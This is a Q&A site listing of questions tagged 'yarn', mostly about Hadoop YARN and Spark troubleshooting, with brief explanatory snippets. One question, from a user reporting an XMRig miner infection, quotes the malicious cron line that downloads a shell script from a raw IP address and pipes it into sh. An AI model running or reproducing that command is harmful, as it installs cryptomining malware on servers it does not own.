Questions tagged [yarn]

1 vote · 0 answers · 997 views

Could not find CoarseGrainedScheduler or it has been stopped

Recently I started working on Talend Big Data. I have written some jobs that are getting executed properly. The data to process in each run is less than a GB, but it's a .gz file. The job runs successfully, but I am frequently facing the below error, although when reprocessing the job without any changes then...
Varun
1 vote · 0 answers · 41 views

Is it normal for Hadoop to be 60 times slower than local computation?

I am doing machine learning tasks on a Hadoop cluster with dozens of nodes (regarding forward execution). For dataset sizes like 10k samples with 300 features, Hadoop processing (running common models like shallow neural nets or decision trees) can take up to 6 hours. Meanwhile, the same or si...
Dims
1 vote · 0 answers · 47 views

How to get the scheduler of an already finished job in Yarn Hadoop?

So I'm in this situation where I'm modifying mapred-site.xml and the specific configuration files of different schedulers for Hadoop, and I just want to make sure that the modifications I have made to the default scheduler (FIFO) have actually taken effect. How can I check the scheduler applied to a...
mani
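One way to verify which scheduler the ResourceManager is actually running is its REST API, which exposes the scheduler type at `/ws/v1/cluster/scheduler` (normally served on port 8088). A minimal sketch, parsing a sample response; the host and the abridged response body are assumptions, not taken from the question:

```python
import json

# Abridged sample shape of GET /ws/v1/cluster/scheduler; the real payload
# would come from e.g. http://<rm-host>:8088/ws/v1/cluster/scheduler
# (<rm-host> is a placeholder).
sample_response = json.dumps({
    "scheduler": {
        "schedulerInfo": {
            "type": "fifoScheduler",
        }
    }
})

def scheduler_type(body: str) -> str:
    """Extract the scheduler type from a /ws/v1/cluster/scheduler payload."""
    return json.loads(body)["scheduler"]["schedulerInfo"]["type"]

print(scheduler_type(sample_response))  # fifoScheduler
```

A capacity or fair scheduler would report `capacityScheduler` or `fairScheduler` in the same field.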
1 vote · 0 answers · 293 views

Spark jobs are not running in the specified queue

I am running a Spark job written in Scala. val conf = new SparkConf().setAppName("BigDataSparkInitialPoc") conf.set("spark.yarn.queue", "Hive") val sc = new SparkContext(conf) The above code is not submitting my job to the queue called "Hive"; instead the job runs in the default queue. I check...
TomG
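For reference, the target queue can also be passed at submit time via spark-submit's `--queue` flag, which is equivalent to setting `spark.yarn.queue`. A command sketch; the class and jar names are placeholders, not from the question:

```shell
# Submit to a specific YARN queue; --queue is equivalent to spark.yarn.queue.
# The name must exactly match a queue configured in the scheduler, and queue
# names are case-sensitive ("Hive" vs "hive" matters).
spark-submit \
  --master yarn \
  --queue Hive \
  --class my.app.Main \
  app.jar
```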
1 vote · 1 answer · 149 views

Possible to start Dask in yarn-client mode?

I use dask_yarn (part of knit) to start a Dask Yarn cluster as follows: import dask_yarn cluster = dask_yarn.DaskYARNCluster(env='/home/hadoop/reqs/dvss.zip', lang='en_US.UTF-8') cluster.start(n_workers=4, memory=5120, cpus=3) This requests 1 vCore on core nodes for AM, and gives the rest of the vCo...
j-bennet
1 vote · 0 answers · 187 views

Spark submit a parallel job

I have a problem with Apache Spark. I have a cluster with 10 nodes (1 master and 9 slaves); each node has 1048 MB of memory. I work in machine learning, so I'd like to run my implementation in parallel, but I cannot make it work: there is always a single Worker that executes the application I submit....
Yacine Mohammed
1 vote · 1 answer · 134 views

Container is running beyond virtual memory limits. Killing container

Current setup: MySQL connector version - mysql-connector-java-5.1.13; Sqoop version - sqoop-1.4.6; Hadoop version - hadoop-2.7.3; Java version - jdk-8u171-linux-x64/jdk1.8.0_171 (Oracle JDK); OS - Ubuntu. Note: also tried with OpenJDK; the same issue exists with that version as well. Sqoop command: bin/sqoop import -conne...
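The usual remedies for this error are giving the container more memory, raising the virtual-to-physical memory ratio, or (as a blunt workaround) disabling the virtual memory check. A yarn-site.xml sketch; the values are illustrative, not tuned for any particular cluster:

```xml
<!-- yarn-site.xml: illustrative values, tune for your cluster -->
<property>
  <!-- Virtual memory allowed per MB of physical memory (default 2.1) -->
  <name>yarn.nodemanager.vmem-pmem-ratio</name>
  <value>4</value>
</property>
<property>
  <!-- Blunt workaround: skip the virtual memory check entirely -->
  <name>yarn.nodemanager.vmem-check-enabled</name>
  <value>false</value>
</property>
```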
1 vote · 1 answer · 203 views

Connecting to Kerberos + SSL enabled Solr in a Spark job under YARN

I have a Solr 6 cluster which is Kerberos and SSL enabled. When I connect to it with a test client using CloudSolrClient, it works fine. But when the same code is run in a Spark job driver, I get the checksum failed error below. I checked all the mentioned checksum-related issues, like reverse DNS lookup, and...
avinash patil
1 vote · 1 answer · 80 views

Monitoring and checking status of YARN

How can I access YARN metrics such as the status of the ResourceManager and NodeManager? The same question applies to running YARN containers. I would like to do this via a web interface.
CypherFancy
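Besides the web UI itself, the ResourceManager serves machine-readable metrics at `/ws/v1/cluster/metrics`. A sketch parsing an abridged sample payload; the host and the sample numbers are assumptions for illustration:

```python
import json

# Abridged sample of GET /ws/v1/cluster/metrics from the ResourceManager
# (normally at http://<rm-host>:8088; <rm-host> is a placeholder).
sample = json.dumps({
    "clusterMetrics": {
        "activeNodes": 5,
        "unhealthyNodes": 1,
        "containersAllocated": 12,
        "availableMB": 40960,
    }
})

def node_health(body: str) -> tuple:
    """Return (active, unhealthy) node counts from a cluster metrics payload."""
    m = json.loads(body)["clusterMetrics"]
    return m["activeNodes"], m["unhealthyNodes"]

print(node_health(sample))  # (5, 1)
```

The same endpoint also reports container and memory figures, which covers the "running yarn containers" half of the question.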
1 vote · 1 answer · 108 views

Jenkins grunt compass ENOENT No such file or directory @ realpath_rec

I am working on an existing project, replacing bower with yarn and upgrading AngularJS from 1.2.9 to 1.3.0. I've got it working on my local system, but it fails on Jenkins when running the deploy grunt task with a filepath issue; the weird thing is that on Jenkins it complains about my local path. Errno::ENOENT...
Subash
1 vote · 0 answers · 334 views

Please explain details for Flink on YARN

Could anybody explain to me the optimal configuration and parallelism for high-performance Flink jobs on YARN? I use Cloudera Hadoop with 4 nodes (1 main node + 3 worker nodes), each with 12 CPUs and 96 GB of memory. There are a few YARN properties: yarn.scheduler.maximum-allocation-mb - current value is 36 GB; y...
1 vote · 1 answer · 168 views

How does YARN check the health of Hadoop nodes in the YARN web console?

I would like to know how the YARN web UI running at port 8088 consolidates the health status of the DataNodes, NameNodes, and other cluster components. For example, this is what I see when I open the web UI: all datanodes are healthy.
Ansible fancy
1 vote · 0 answers · 23 views

Spark streaming : WAL ignored

I have a Spark streaming application running on YARN that consumes from a JMS source. I have checkpointing and the WAL enabled to ensure zero data loss. However, when I suddenly kill my application and restart it, sometimes it recovers the data from the WAL but sometimes it doesn't! In all the...
Lezzar Walid
1 vote · 0 answers · 152 views

YARN is infected with the XMRig miner trojan

The HDP stack YARN process is infected with the XMRig trojan; even if I use the kylo ex2 sandbox, I get this trojan, which takes 100% of the CPU. yarn) CMD (wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1) This is a cron job, run by the yarn user, that generates files and load on the server tr...
Raja Marimuthu
1 vote · 0 answers · 135 views

YarnAllocator requests containers more than I asked for

YarnAllocator and the YARN ResourceManager acted so generously that more containers were requested and granted than I put in the config. I asked for a total of 72 containers and it gave me 133 containers. What I expected is that YarnAllocator would allocate only as many as I asked for. Can someone please explain what happened? An...
minyo
1 vote · 0 answers · 205 views

Spark, with tons of memory, failing to join dataframes due to OOM

We're using Spark at work to do some batch jobs, but now that we're loading up a larger set of data, Spark is throwing java.lang.OutOfMemoryError. We're running with YARN as the resource manager, but in client mode. Driver memory = 64gb Driver cores = 8 Executors = 8 Executor memory = 20gb E...
CubemonkeyNYC
1 vote · 2 answers · 200 views

Can't access the Spark UI through YARN

I'm building a Docker image to run Zeppelin or spark-shell locally against a production Hadoop cluster with YARN. I can execute jobs or a spark-shell fine, but when I try to access the Tracking URL on YARN while a job is running, it hangs the YARN UI for exactly 10 minutes. YARN keeps working an...
Pau Trepat
1 vote · 1 answer · 282 views

AWS-EMR error exit code 143

I'm running an analysis on AWS EMR and I am getting an unexpected SIGTERM error. Some background: I'm running a script that reads in many CSV files I have stored on S3 and then performs an analysis. My script is, schematically: analysis_script.py import pandas as pd from pyspark.sql import SQLCont...
cracka31
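Exit code 143 is not EMR-specific: it is the conventional shell encoding of "killed by a signal", 128 plus the signal number, and 128 + 15 (SIGTERM) = 143 — typically YARN terminating a container. A minimal sketch of the arithmetic:

```python
import signal

# Exit codes above 128 conventionally encode 128 + <signal number>.
# 143 therefore means the process received SIGTERM (signal 15),
# e.g. YARN killing a container that exceeded its memory limits.
def exit_code_for(sig: signal.Signals) -> int:
    return 128 + int(sig)

print(exit_code_for(signal.SIGTERM))  # 143
```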
1 vote · 0 answers · 178 views

Yarn force a package to use a specific version

I currently have the following issue when running a unit test using the Jest Vue CLI plugin found here: https://www.npmjs.com/package/@vue/cli-plugin-unit-jest The error I receive is: Requires Babel '^7.0.0-0', but was loaded with '6.26.3'. If you are sure you have a compatible version of @babel/core...
matthew
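Yarn (the JS package manager) can pin a transitive dependency via the `resolutions` field in package.json. A sketch for the Babel 6/7 mismatch above, using the bridge package commonly recommended for this conflict; verify the version against your own dependency tree:

```json
{
  "resolutions": {
    "babel-core": "7.0.0-bridge.0"
  }
}
```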
1 vote · 0 answers · 99 views

Flink on YARN: container's physical memory usage keeps rising

When I search for the container, it shows: yarn 38530 116969 0 Jul17 ? 00:00:00 bash /mnt/dfs/2/hadoop/yarn/local/usercache/sloth/appcache/application_1526888270443_0045/container_e12_1526888270443_0045_01_000039/default_container_executor.sh yarn 38533 38530 0 Jul17 ?...
spoon
1 vote · 0 answers · 99 views

Spark shuffle error: Incorrect header or version mismatch error

I am running Spark on YARN and get a weird error when loading JSON files from HDFS. I use PySpark on a Jupyter notebook but it doesn't get to any part where data is actually collected. The following is my code: df = spark.read.option('timestampFormat', 'yyyy/MM/dd HH:mm:ss ZZ').json('hdfs://:8020//*...
Anton.P
1 vote · 0 answers · 677 views

Could not find or load main class org.apache.spark.deploy.yarn.ExecutorLauncher

I have submitted this job fine in YARN mode, but I get the following error. I added a Spark jar installed locally, but the Spark jar can also be in a world-readable location on HDFS; this allows YARN to cache it on nodes. I also added yarn_config_dir and hadoop_config_dir to .bashrc. ERROR: Could not find o...
Srinivas Rao M
1 vote · 0 answers · 22 views

Disruptive java processes on local machine after connecting to yarn-managed spark cluster with sparklyr

I am using sparklyr to connect to a yarn-managed spark cluster that is not located on my server. I have a local installation of spark that acts as a client for the back-and-forth to the yarn cluster. PROBLEM: I'm seeing some java processes that hang around on my local server (especially when I kill...
Zafar
1 vote · 1 answer · 128 views

Change tmp directory while running yarn jar command

I am running an MR job using the yarn jar command, and it creates a temporary jar in the /tmp folder, which fills up the entire disk space. I want to redirect the path of this jar to some other folder where I have more disk space. From this link, I came to know that we can change the path by setting the propert...
Charul
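One approach worth trying for the client-side JVM that `yarn jar` starts is pointing `java.io.tmpdir` at a larger disk via `HADOOP_CLIENT_OPTS`. A sketch; the path, jar, and class names are placeholders, not from the question:

```shell
# Redirect the client JVM's temp directory (where the job jar is unpacked)
# away from /tmp; /data/tmp is a placeholder path with more free space.
mkdir -p /data/tmp
export HADOOP_CLIENT_OPTS="-Djava.io.tmpdir=/data/tmp $HADOOP_CLIENT_OPTS"
yarn jar myjob.jar MyMainClass
```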
1 vote · 0 answers · 66 views

How do I get the YARN application ID from within a Mapper?

How do I get a yarn application ID from within a mapper? It looks like I can get the CONTAINER_ID from an environment variable with the same name, and it looks like the format of the containerID is similar to the application ID, but it is not the same. Is there a better way to do this? >>> sc.applic...
vy32
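Since the excerpt notes that `CONTAINER_ID` is available as an environment variable, one workable approach is to derive the application ID from it: container IDs follow `container_[e<epoch>_]<clusterTimestamp>_<appId>_<attemptId>_<containerId>`, and the application ID reuses the first two numeric fields. A sketch (the example ID is borrowed from another question on this page):

```python
import re

def app_id_from_container_id(container_id: str) -> str:
    """Derive the YARN application ID embedded in a container ID.

    Container IDs look like
    container_[e<epoch>_]<clusterTimestamp>_<appId>_<attemptId>_<containerId>;
    the application ID is application_<clusterTimestamp>_<appId>.
    """
    m = re.match(r"container_(?:e\d+_)?(\d+)_(\d+)_\d+_\d+$", container_id)
    if m is None:
        raise ValueError(f"unrecognized container ID: {container_id}")
    return f"application_{m.group(1)}_{m.group(2)}"

print(app_id_from_container_id("container_e12_1526888270443_0045_01_000039"))
# application_1526888270443_0045
```

In a mapper this would be applied to `os.environ["CONTAINER_ID"]`.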
1 vote · 0 answers · 63 views

Spark YARN mode is not working; throws a Java NullPointerException in executor stages

My Scala program parses the log using a Java object method called parse, and it works fine in local[*] mode; however, it works in neither Cloudera YARN client mode nor cluster mode. val hivehbaserows = spark.sql("select log msg from hivehbasetable") hivehbaserows.foreach(x => { val line =...
tech questions
1 vote · 1 answer · 261 views

Spark history server and clearing history

What is the best way to clear out the History Server entries? My cluster has many executions which show up as application IDs. I know these occupy a significant amount of hard disk space in the HDFS file system (I am assuming). Actually, the heap memory usage of the History Server is continuing...
Prashant A
1 vote · 0 answers · 84 views

MapReduce job is not running on a HADOOP 2.6.0 (Multi node cluster)

I have completed a Hadoop 2.6.0 multi-node cluster setup successfully on 4 machines (1 master and 3 slaves). But when I try to run a simple word count job on the cluster, it gets stuck. It's stuck here: :~$ hadoop jar ~/MY_MAP_JARS/wordcount_f2.jar /input/crime /output/cc1 18/07/31 02:25:04 INFO client.RMPr...
ArunTnp
1 vote · 0 answers · 102 views

Fair Scheduler without preemption on YARN

I have the following FairScheduler configuration for an M/R job on EMR 5.16.0 (Hadoop 2.8.3): queue1 - weight 1.0; queue2 - weight 3.0. These 2 queues are under the root queue. I start an application app1 on queue1, and given that nothing else is running, the application will take 100% of the EMR c...
LaviniaS
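For reference, the weights from the question would be expressed in the Fair Scheduler allocation file roughly as follows; the preemption timeout value is illustrative, and preemption additionally requires `yarn.scheduler.fair.preemption` to be enabled in yarn-site.xml:

```xml
<?xml version="1.0"?>
<allocations>
  <queue name="queue1">
    <weight>1.0</weight>
  </queue>
  <queue name="queue2">
    <weight>3.0</weight>
    <!-- Without a preemption timeout (and cluster-wide preemption enabled),
         queue2 only gets resources as queue1's containers finish. -->
    <fairSharePreemptionTimeout>60</fairSharePreemptionTimeout>
  </queue>
</allocations>
```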
1 vote · 1 answer · 153 views

spark - application returns different results based on different executor memory?

I am noticing some peculiar behaviour: I have a Spark job which reads the data, does some grouping, ordering, and joining, and creates an output file. The issue is when I run the same job on YARN with more memory than the environment has, e.g. the cluster has 50 GB and I submit spark-submit with close...
user1122
1 vote · 0 answers · 148 views

How to aggregate custom application logs in Spark on HDInsight?

CONTEXT: I want to configure custom logging in an application written in Python and running on an HDInsight Spark cluster (hence Hortonworks-style). HDInsight cluster type: Spark 2.2 on Linux (HDI 3.6); Spark version: 2.2.0.2.6.3.2-13. My requirements are as follows: logging to a file, aggregating l...
Dominik
1 vote · 1 answer · 38 views

PIG - SET yarn garbage collection

I am trying to set following properties in a Pig script: mapreduce.reduce.java.opts='-Xmx6114m -XX:+UseG1GC -verbose:gc -XX:+PrintGC -XX:+PrintGCDateStamps' yarn.app.mapreduce.am.command-opts='-Xmx6114m -XX:+UseG1GC -verbose:gc -XX:+PrintGC -XX:+PrintGCDateStamps' As SET mapreduce.reduce.java.opt...
Freeman
1 vote · 1 answer · 159 views

Some YARN worker nodes do not join the cluster when I create a Spark cluster on Dataproc

I have created a Spark cluster on Dataproc with 1 master and 6 worker nodes. On the GCP console I can see 6 VMs running, but I only see 5 nodes in the YARN Node Manager UI. When I ssh into that machine, from the yarn-yarn-nodemanager log I see it keeps restarting and reconnecting to the NodeManager. How ca...
howie
1 vote · 1 answer · 174 views

Spark/Yarn: FileNotFoundException

I am running the following code in Spark. scala>import com.databricks.spark.xml.XmlInputFormat scala>import org.apache.hadoop.io._ scala>sc.hadoopConfiguration.set(XmlInputFormat.START_TAG_KEY,'') scala>sc.hadoopConfiguration.set(XmlInputFormat.END_TAG_KEY,'') scala>sc.hadoopConfiguration.set(XmlInp...
HSP
1 vote · 0 answers · 128 views

Spark failure detection - why doesn't the DataNode send a heartbeat to the master machine (driver)?

As everyone knows, a heartbeat is a signal sent periodically to indicate the normal operation of a node or to synchronize with other parts of the system. In our system we have 5 worker machines, while executors run on 3 of them. Our system includes 5 DataNode machines (workers) and 3 master machine...
Judy
1 vote · 0 answers · 222 views

Spark application cannot run successfully on EMR with YARN

My Spark application runs perfectly in client mode with master local[*] on EMR, and in yarn mode locally too. Spark submit command: spark-submit --deploy-mode cluster --master yarn \ --num-executors 3 --executor-cores 1 --executor-memory 2G \ --conf spark.driver.memory=4G --class my.APP \ --packages org.a...
tom10271
1 vote · 0 answers · 37 views

Unable to connect to YARN webapp UI in CDH 5.11.2

This CDH cluster has been installed for months and is used to back up logs. Today I tried to run Flink on YARN and wanted to open the YARN web UI to check the Flink TaskManagers' state, but I found that port 8088 refuses connections. ``` This site can't be reached 47.74.***.*** refused to connect. Search Google for *** ***...
user1978965
1 vote · 0 answers · 88 views

Spark Fixed Width File Import Large number of columns causing high Execution time

I am getting a fixed-width .txt source file from which I need to extract 20K columns. Due to the lack of libraries for processing fixed-width files in Spark, I have developed code which extracts the fields from fixed-width text files. The code reads the text file as an RDD with sparkContext.textFile('ab...
Katty
1 vote · 0 answers · 43 views

Pig on mapreduce mode is stuck on dumping hdfs data in Hortonworks HDP

I have some data files in my Hortonworks HDFS location. My requirement is to dump the HDFS data in the Pig shell using Pig's MapReduce mode. After loading the file data from HDFS, when I try to dump the data in the Pig shell using the DUMP command, the MapReduce job gets stuck at 0% and does not complete the job...
sandip
1 vote · 0 answers · 111 views

Executing a Hive query causes the YARN ResourceManager to throw a "file does not exist" exception

I'm configuring Hive 3.1.0 to work with Hadoop 3.0.0. This error is thrown almost immediately when I submit a simple query in Beeline that causes a MapReduce job: 0: jdbc:hive2://> select count(*) from airlinedata; 18/10/11 10:24:45 [HiveServer2-Background-Pool: Thread-124]: WARN ql.Driver: Hive-on-MR is depre...
mtu
